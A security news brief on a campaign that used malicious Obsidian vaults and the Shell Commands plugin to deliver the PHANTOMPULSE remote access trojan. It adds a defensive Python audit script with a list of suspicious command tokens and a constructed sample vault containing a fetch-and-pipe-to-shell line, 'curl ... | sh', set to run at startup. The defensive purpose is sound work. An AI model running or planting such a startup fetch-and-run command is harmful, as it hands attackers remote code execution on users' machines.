TechFlow news: On April 15, Elastic Security Labs disclosed that threat actors impersonated venture capital firms and, via LinkedIn and Telegram, lured targets into opening malicious Obsidian note libraries (vaults). When a victim opened the note library, the attack used Obsidian's Shell Commands plugin to execute malicious payloads; no vulnerability was exploited.
PHANTOMPULSE, a previously undocumented Windows remote access trojan (RAT) discovered in this campaign, uses Ethereum transaction data for blockchain-based command-and-control (C2) communications. The macOS payload employs an obfuscated AppleScript dropper and uses a Telegram channel as a fallback C2. Elastic Defend detected and blocked PHANTOMPULSE before it could execute.
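As an added example (not code from Elastic's report or from the Obsidian project), the following script audits a vault received from an untrusted party before it is opened: it checks whether the Shell Commands plugin is enabled and lists every configured command string, flagging those that warrant a human look. The file layout (`.obsidian/community-plugins.json`, `.obsidian/plugins/<id>/data.json`), the plugin id `obsidian-shellcommands`, and the `shell_command` field name are assumptions to verify against your own vault; the sample vault is constructed.

```python
import json
import tempfile
from pathlib import Path
from typing import Any, Iterator

# Assumed layout (not from the report): enabled community plugin ids live in
# .obsidian/community-plugins.json; plugin settings in .obsidian/plugins/<id>/data.json.
SHELL_PLUGIN_ID = "obsidian-shellcommands"  # assumed plugin id
# Tokens that deserve review when found in a command that may run on vault open.
REVIEW_TOKENS = ("curl ", "wget ", "powershell", "osascript", "base64", "invoke-", "| sh", "| bash")

def enabled_plugins(vault: Path) -> list[str]:
    f = vault / ".obsidian" / "community-plugins.json"
    if not f.is_file():
        return []
    data = json.loads(f.read_text(encoding="utf-8"))
    return [p for p in data if isinstance(p, str)] if isinstance(data, list) else []

def _strings(obj: Any, path: str = "$") -> Iterator[tuple[str, str]]:
    """Walk an arbitrary JSON value and yield (json_path, string_value) pairs."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _strings(v, f"{path}.{k}")
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _strings(v, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj

def audit_vault(vault: Path) -> dict[str, Any]:
    """Report whether Shell Commands is enabled and which command strings it holds."""
    report: dict[str, Any] = {"shell_commands_enabled": SHELL_PLUGIN_ID in enabled_plugins(vault),
                              "commands": [], "review": []}
    cfg = vault / ".obsidian" / "plugins" / SHELL_PLUGIN_ID / "data.json"
    if cfg.is_file():
        for jpath, value in _strings(json.loads(cfg.read_text(encoding="utf-8"))):
            if "command" in jpath.lower():  # field naming is an assumption; match broadly
                report["commands"].append((jpath, value))
                if any(tok in value.lower() for tok in REVIEW_TOKENS):
                    report["review"].append((jpath, value))
    return report

def build_sample_vault() -> Path:
    """Constructed sample vault (not real campaign data): one benign, one suspicious command."""
    vault = Path(tempfile.mkdtemp())
    plugin_dir = vault / ".obsidian" / "plugins" / SHELL_PLUGIN_ID
    plugin_dir.mkdir(parents=True)
    (vault / ".obsidian" / "community-plugins.json").write_text(json.dumps([SHELL_PLUGIN_ID]))
    (plugin_dir / "data.json").write_text(json.dumps({"shell_commands": [
        {"shell_command": "git pull", "events": {"after-obsidian-starts": True}},
        {"shell_command": "curl -s http://example.invalid/x | sh", "events": {"after-obsidian-starts": True}}]}))
    return vault

if __name__ == "__main__":
    print(json.dumps(audit_vault(build_sample_vault()), indent=2))
```

Run it against a vault directory before opening it in Obsidian; an empty `commands` list with the plugin enabled still merits a look at the plugin's own code, which this check does not inspect.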